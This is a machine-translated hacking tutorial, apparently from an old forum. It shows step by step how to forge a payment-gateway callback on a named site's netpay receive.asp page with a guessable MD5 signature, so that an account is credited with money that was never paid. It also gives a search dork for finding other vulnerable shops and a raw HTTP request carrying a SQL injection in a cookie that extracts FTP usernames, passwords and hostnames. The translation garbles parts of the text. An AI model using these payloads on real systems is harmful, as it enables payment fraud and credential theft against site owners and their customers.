Test site: http: www.xiaoweio.cn registered account, for example, test Access: http: www. xiaoweio. cnnetpayips enter your user name and recharge amount. For example, the next step at test10 will generate an order number for you. For example, 722978 remember its parameter structure: billno order number amount Recharge amount date
Test site:Http://www.xiaoweio.cn/
Register an account, for example, test
Access:Http://www.xiaoweio.cn/netpay/ips/
Enter your username and recharge amount.
Example: test 10 yuan
Click Next to generate an order number for you. For example, 722978
Remember it
Parameter construction:
BilLnO = Order No. & amount = Recharge amount &Date= Date &SuCc = Y & signature = md5 Value
Copy code
Date = current date
Recharge Amount = amount on the order number
Add the actual value:
Billno = 722978 & amount = 5 & date = 20100613 & succ = Y & signature = 990a56c327f4b60d0c4d94a880f728ec
Md5 value = md5 (billno & amount & date & succ)
The actual md5 value demonstrated here is:
Md5 (722978520100613Y) = 990a56c327f4b60d0c4d94a880f728ec
Submit url
Http://www.xiaoweio.cn/netpay/ips/receive.asp? Billno = 722978 & amount = 5 & date = 20100613 & succ = Y & signature = 990a56c327f4b60d0c4d94a880f728ec
In this way, five yuan will come.
Give you a keyword: inurl: (netpay/alipay)
Injection Vulnerability
POST/netpay/allbuy/receive. asp? Amount = 1 & success = Y & sign = d3d9Df7301929c5684fb52c267186b21 HTTP/1.1
Cookie: billno = 1' % 20or % 200% 3c % 3e (select % 20top % 201% 20FtpName % 2 bchar (124) % 2 bftppassword % 2 bchar (124) % 2 bhostname % 20 from % 20FreeHost. FreeHost_ProDuCt_Host % 20 where % 20Id% 20not % 20in (select % 20top % 200% 20id % 20 from % 20FreeHost. FreeHost_Product_Host % 20 order % 20by % 20id) % 20 order % 20by % 20id) % 3b --
Content-Type: appliCatIon/x-www-foRm-UrleNcOdEd
Referer:Http://www.9c2c.com/netpay/allbuy/receive.asp? Amount = 1 & success = Y & sign = d3d9df7301929c5684fb52c267186b21
Host:Www.9c2c.com
Content-Length: 7
Secondary CT: 100-continue
Connection: Keep-Alive